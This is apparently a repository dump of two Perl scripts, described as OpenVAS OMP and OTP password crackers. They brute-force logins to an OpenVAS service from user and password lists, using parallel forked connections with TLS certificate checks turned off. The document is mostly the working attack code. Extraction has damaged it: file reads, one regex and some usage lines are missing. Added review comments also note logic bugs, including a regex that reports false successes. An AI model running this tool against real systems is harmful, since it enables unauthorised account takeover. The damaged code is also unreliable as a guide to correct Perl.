| # print STDERR "Oldpid: $oldpid\n"; 81 | foreach my $i (0 .. $#childs) { 82 | next if ($oldpid); 83 | if ($childs[$i] eq $oldpid) { 84 | delete $childs[$i]; 85 | last; 86 | } 87 | } 88 | $total++; 89 | $pid = fork(); 90 | die ("[e] cannot fork in wait: $!") if (!defined($pid)); 91 | if ($pid) { 92 | push @childs, $pid; 93 | last if ($loop==0); 94 | } else { 95 | last;# if children skip while loop 96 | 97 | } 98 | last; 99 | } 100 | } 101 | if ($pid) {%comb = getcomb();} 102 | next; 103 | } 104 | } 105 | unless ($pid) { 106 | # children 107 | # print STDERR "Children\n"; 108 | ov_guess($comb{'user'},$comb{'pass'}); 109 | exit(0); 110 | } 111 | } 112 | 113 | $SIG{'INT'} = 'DEFAULT'; 114 | foreach (@childs) { 115 | waitpid($_, 0) 116 | } 117 | 118 | my $endtime = time(); 119 | my $difftime = $endtime - $starttime; 120 | 121 | print STDERR "\n"; 122 | print STDERR "[i] Statistics: $total tries in $difftime seconds.\n"; 123 | print STDERR "[i] END\n"; 124 | 125 | sub getcomb { 126 | my %comb; 127 | while (1) { 128 | unless ($comb{'pass'} = ) { 129 | while (1) { 130 | unless ($comb{'user'} = 
) {
                    $comb{'nomore'} = 1;
                    return %comb;
                } else {
                    chomp($comb{'user'});
                    if ($comb{'user'} eq '') {
                        next;
                    } else {
                        $userglob=$comb{'user'};
                        seek (PASS,0,0);
                        last;
                    }
                }
            }
        } else {
            $comb{'user'}=$userglob;
            chomp($comb{'pass'});
            if ($comb{'pass'} eq '') {
                next;
            } else {
                last
            }
        }
    }
    $comb{'nomore'} = 0;
    return %comb;
}

# SIGINT handler: re-installs itself, prints a notice and clears $loop.
# It stops nothing on its own; whatever code tests $loop has to notice.
sub ctrlc {
    $SIG{INT} = \&ctrlc;
    print "\nCTRL+C presssed, stopping.\n";
    $loop=0;
}

# Try one user/password pair against the service at $ov_host:$ov_port.
#
# Arguments: ($user, $password).
# Returns:   nothing useful; the outcome is reported on STDOUT/STDERR only.
#
# Every call opens its own TLS connection, sends one request, reads one line
# and closes the socket again, so each attempted pair is a separate
# short-lived connection as seen from the listening service.
sub ov_guess {
    my ($user, $password) = @_;
    # SSL_verify_mode => 0 switches peer-certificate verification off, so the
    # identity of the endpoint is never checked and the credentials are sent
    # to whatever answers on that port.  SSL_version => 'TLSv1' pins the
    # handshake to TLS 1.0.
    my $ov_sock = IO::Socket::SSL->new(
        PeerAddr => $ov_host,
        PeerPort => $ov_port,
        SSL_verify_mode => 0,
        SSL_version => 'TLSv1',
        Timeout => $timeout
    );
    if(!$ov_sock) {
        warn ("[w] Cannot connect to sock: $!");
        return;
    }
    $ov_sock->autoflush();

    # NOTE(review): on this page the request is just "$user$password\r\n";
    # the variable name suggests XML markup around the two values that was
    # stripped when the page was extracted -- compare with the upstream file.
    #my $xmlauthreq="$user$password";
    my $xmlauthreq="$user$password\r\n";
    #my $xmlcommreq="\n";

    #$ov_sock->print($xmlauthreq.$xmlcommreq);
    $ov_sock->print($xmlauthreq);
    #$ov_sock->print("\n");
    $ov_sock->flush();
    #sleep 1;
    #$ov_sock->print($xmlreq."\n");
    my $line = $ov_sock->getline;
    #my $line;
    #while ($ov_sock->pending) {
    # Dead code: the condition is the constant 0, so this polling loop never runs.
    if (0) {
        while (length($line) == 0) {
            my $buff;
            # $ov_sock->read($buff, 1024);
            sysread ($ov_sock, $buff, 1024);
            $line=$line.$buff;
            # sleep 15;
            sleep 1;
            print STDERR ".";
        }
    }
    # This debug print runs before the defined() check below, so $line can
    # still be undef here.
    print STDERR "[p] $line:\n" if ($verbose>10);

    if(!defined($line)) {
        #while ($ov_sock->connected) { $line = $ov_sock->getline; print $line; }
        $ov_sock->close(SSL_ctx_free => 1);
        # The warning and the print that follows both put the attempted
        # credentials on the terminal in clear text.
        warn ("[w] $user:$password. Hmm. No answer. Worth checking out. 
Not OpenVAS Manager or TCP wrapped ?");
        print $xmlauthreq."\n";
        return;
    }

    unless ($ov_sock->connected) {
        print STDERR "[i] Combination $user:$password: Disconnected\n" if ($verbose>0);
    }

    # Classification is by substring match on the single line read above.
    if($line =~ /Authentication failed/gis) {
        print STDERR $line."\n" if ($verbose>5);
        print STDERR "[i] Combination $user:$password: Wrong\n" if ($verbose>1);
        # NOTE(review): the pattern and the first statement of the next
        # branch are truncated on this page (extraction damage); the branch
        # is the one that reports a successful login.
    } elsif ($line =~ /1);
        # Written to STDOUT, unlike the diagnostics above: the working
        # password ends up in clear text in any captured output.
        print "[o] Success! User: $user and Password: $password\n";
    } else {
        print STDERR $line."\n" if ($verbose>5);
        print STDERR "[i] Combination $user:$password: Unknown\n" if ($verbose>0);
    }

    $ov_sock->close(SSL_ctx_free => 1);
}

# Print the usage text and exit with status 0.
# NOTE(review): several usage lines below appear to have lost their
# placeholder words in page extraction, which also split the -p and -P
# lines; the strings are reproduced as found.
sub help
{
    print "$0: OpenVAS OMP password cracker. \n";
    print "Copyright (C) Vlatko Kosturjak, Kost. Distributed under GPL.\n\n";
    print "Usage: $0 -i 127.0.0.1 -p 9390 -U userlist.txt -P passlist.txt\n\n";
    print " -i Use target IP (default: $ov_host)\n";
    print " -p

Use port

(default: $ov_port)\n";
    print " -U Use user list \n";
    print " -P

Use password list

\n";
    print " -m Maximum number of parallel request (default: $maxreq)\n";
    print " -t use sock timeout \n";
    print " -v verbose (-vv will display every combination tried)\n";
    print " -h this help message\n";
    exit (0);
}
--------------------------------------------------------------------------------
/openvas-otp-pwcrack.pl:
--------------------------------------------------------------------------------
#!/usr/bin/perl
# OpenVAS OTP password cracker
# Copyright (C) Vlatko Kosturjak, Kost. Distributed under GPL

use strict;
use IO::Socket::SSL;
use Getopt::Long;

# Defaults; each can be overridden by the command-line options parsed below.
my $verbose = 0;
my $ov_host = "localhost";
my $ov_port = "9390";
# Greeting line sent first on every connection; ov_guess compares the
# reply with this same string.
my $ov_hello = "< OTP/1.0 >\n";
my $timeout = 15;
my $userfile;
my $passfile;
my $maxreq = 16;

# Bookkeeping for the forking loop: child pids, fork counter, attempt counter.
my @childs;
my $ch=0;
my $total=0;

# $pid doubles as the "am I the parent" flag (non-zero in the parent).
# $loop is cleared by the SIGINT handler or when the word lists run out.
my $pid = 1;
my $loop = 1;

Getopt::Long::Configure ("bundling");

my $result = GetOptions (
    "i|ip=s" => \$ov_host,
    "p|port=i" => \$ov_port,
    "U|users=s" => \$userfile,
    "P|passwords=s" => \$passfile,
    "m|maxreq=i" => \$maxreq,
    "t|timeout=i" => \$timeout,
    "v|verbose+" => \$verbose,
    "h|help" => \&help
);

# Both list files are mandatory; help() prints the usage text and exits.
unless ($userfile and $passfile) {
    help();
}

print STDERR "OpenVAS OTP password cracker. (C) Kost. 
Distributed under GPL.\n\n";

# NOTE(review): two-argument open with the path interpolated into the mode
# string; the name comes straight from the command line, and this form does
# not take it literally the way the three-argument open does.
open(USER,"<$userfile") or die ("cannot open user file $userfile: $!");
open(PASS,"<$passfile") or die ("cannot open password file $passfile: $!");

# NOTE(review): the right-hand side of this assignment is missing on this
# page (extraction damage); presumably a line read from the USER handle --
# confirm against the upstream file.
my $userglob = ;
chomp $userglob;

$SIG{INT} = \&ctrlc;
my %comb;

print STDERR "[i] Cracking.\n";
my $starttime=time();

# Main loop.  The parent ($pid non-zero) fetches the next user/password
# pair and forks; each child ($pid == 0) falls through to the block at the
# bottom, makes exactly one attempt with the pair in %comb and exits.
while ($loop) {
    if ($pid) {
        # print STDERR "Main/Parent\n";
        %comb = getcomb();

        if ($comb{'nomore'} == 1) {
            $loop = 0;
            next;
        }
        # Below the limit: fork straight away.  $ch only ever grows, so once
        # it reaches $maxreq every later pair goes through the else branch.
        if ($ch<$maxreq) {
            $ch++;
            # print STDERR "Forking $ch\n";
            $pid = fork();
            die ("[e] cannot fork: $!") if (!defined($pid));
            if ($pid) {
                push @childs, $pid;
                $total++;
            }
        } else {
            # wait for children to die
            while ($#childs>0) {
                #print STDERR "waiting to die\n";
                if (my $oldpid=waitpid(-1, 0)) {
                    # print STDERR "Oldpid: $oldpid\n";
                    # NOTE(review): `next if ($oldpid)` is always taken here,
                    # because the enclosing `if` already required $oldpid to
                    # be true; the delete below is therefore never reached
                    # and @childs keeps the pids of reaped children.
                    foreach my $i (0 .. $#childs) {
                        next if ($oldpid);
                        if ($childs[$i] eq $oldpid) {
                            delete $childs[$i];
                            last;
                        }
                    }
                    $total++;
                    $pid = fork();
                    die ("[e] cannot fork in wait: $!") if (!defined($pid));
                    if ($pid) {
                        push @childs, $pid;
                        last if ($loop==0);
                    } else {
                        last;# if children skip while loop

                    }
                    last;
                }
            }
            if ($pid) {%comb = getcomb();}
            next;
        }
    }
    unless ($pid) {
        # children
        # print STDERR "Children\n";
        ov_guess($comb{'user'},$comb{'pass'});
        exit(0);
    }
}

# Restore the default SIGINT behaviour, then wait for every recorded child.
$SIG{'INT'} = 'DEFAULT';
foreach (@childs) {
    waitpid($_, 0)
}

my $endtime = time();
my $difftime = $endtime - $starttime;

print STDERR "\n";
print STDERR "[i] Statistics: $total tries in $difftime seconds.\n";
print STDERR "[i] END\n";

# Return the next user/password pair as a flat hash with the keys 'user',
# 'pass' and 'nomore'.  'nomore' is 1 once the user list is exhausted and 0
# otherwise.  Empty lines in either list are skipped.  When the password
# source yields nothing more, the next user is taken, stored in $userglob,
# and PASS is rewound to its start with seek.
#
# NOTE(review): the expressions assigned to $comb{'pass'} and $comb{'user'}
# are missing on this page (extraction damage); presumably line reads from
# the PASS and USER handles -- confirm against the upstream file.
sub getcomb {
    my %comb;
    while (1) {
        unless ($comb{'pass'} = ) {
            while (1) {
                unless ($comb{'user'} = ) {
                    $comb{'nomore'} = 1;
                    return %comb;
                } else {
                    chomp($comb{'user'});
                    if ($comb{'user'} eq '') {
                        next;
                    } else {
                        $userglob=$comb{'user'};
                        seek (PASS,0,0);
                        last;
                    }
                }
            }
        } else {
            $comb{'user'}=$userglob;
            chomp($comb{'pass'});
            if ($comb{'pass'} eq '') {
                next;
            } else {
                last
            }
        }
    }
    $comb{'nomore'} = 0;
    return %comb;
}

# SIGINT handler: re-installs itself, prints a notice and clears $loop so
# that the main loop ends at its next test of the flag.
sub ctrlc {
    $SIG{INT} = \&ctrlc;
    print "\nCTRL+C presssed, stopping.\n";
    $loop=0;
}

# Try one user/password pair against the service at $ov_host:$ov_port.
#
# Arguments: ($user, $password).
# Returns:   nothing useful; the outcome is reported on STDOUT/STDERR only.
#
# Sequence, as written below: connect over TLS, send $ov_hello and require
# the same line back, send the user name and the password on separate
# lines, read one reply line and classify it.  Every call uses its own
# connection, so each attempted pair is a separate short-lived connection
# as seen from the listening service.
sub ov_guess {
    my ($user, $password) = @_;
    # SSL_verify_mode => 0 switches peer-certificate verification off, so the
    # identity of the endpoint is never checked and the credentials are sent
    # to whatever answers on that port.
    my $ov_sock = IO::Socket::SSL->new(
        PeerAddr => $ov_host,
        PeerPort => $ov_port,
        SSL_verify_mode => 0,
        Timeout => $timeout
    );
    if(!$ov_sock) {
        warn ("[w] Cannot connect to sock: $!");
        return;
    }
    $ov_sock->autoflush();

    $ov_sock->print($ov_hello);
    my $line = $ov_sock->getline;

    if(!defined($line)) {
        $ov_sock->close(SSL_ctx_free => 1);
        warn ("[w] Hmm. No answer. Is it OpenVAS server or TCP wrapped ?");
        return;
    }

    # The reply must be byte-for-byte the greeting that was sent.
    if($line eq $ov_hello) {
        print STDERR "[d] Handshake OK\n" if ($verbose>3);
    } else {
        $ov_sock->close(SSL_ctx_free => 1);
        warn ("[w] Hmm. Strange answer. Is it OpenVAS server?");
        return;
    }

    print STDERR "[d] Sending login data: " if ($verbose>3);
    $ov_sock->print($user ."\n");
    $ov_sock->print($password . "\n");
    print STDERR "done!\n" if ($verbose>3);

    print STDERR "[d] Waiting for answer line: " if ($verbose>3);
    # Unlike the first read, this one is not checked with defined(); $line
    # may be undef when the peer closes the connection without replying.
    $line = $ov_sock->getline;
    print STDERR "done!\n" if ($verbose>3);

    unless ($ov_sock->connected) {
        print STDERR "[i] Combination $user:$password: Disconnected\n" if ($verbose>0);
    }

    if($line =~ /Bad login/gis) {
        print STDERR "[i] Combination $user:$password: Wrong\n" if ($verbose>1);
    # NOTE(review): the `|` characters are unescaped, so this pattern is an
    # alternation of three pieces ("SERVER <", ">.*<", "> SERVER") rather
    # than one literal "SERVER <|>" ... "<|> SERVER" frame; a reply matching
    # any one piece is reported as a success.
    } elsif ($line =~ /SERVER <|>.*<|> SERVER/gis) {
        print STDERR "[i] Combination $user:$password: Sucess\n" if ($verbose>1);
        # Written to STDOUT, unlike the diagnostics: the working password
        # ends up in clear text in any captured output.
        print "[o] Success! User: $user and Password: $password\n";
    } else {
        print STDERR "[i] Combination $user:$password: Unknown\n" if ($verbose>0);
    }

    $ov_sock->close(SSL_ctx_free => 1);
}

# Print the usage text and exit with status 0.  Used both as the -h/--help
# callback of GetOptions and when either list file is missing.
# NOTE(review): several usage lines below appear to have lost their
# placeholder words in page extraction, which also split the -p and -P
# lines; the strings are reproduced as found.
sub help
{
    print "$0: OpenVAS OTP password cracker. \n";
    print "Copyright (C) Vlatko Kosturjak, Kost. Distributed under GPL.\n\n";
    print "Usage: $0 -i 127.0.0.1 -p 9390 -U userlist.txt -P passlist.txt\n\n";
    print " -i Use hostname or IP (default: $ov_host)\n";
    print " -p

Use port

(default: $ov_port)\n";
    print " -U Use user list \n";
    print " -P

Use password list

\n";
    print " -m Maximum number of parallel request (default: $maxreq)\n";
    print " -t use sock timeout \n";
    print " -v verbose (-vv will display every combination tried)\n";
    print " -h this help message\n";
    exit (0);
}
--------------------------------------------------------------------------------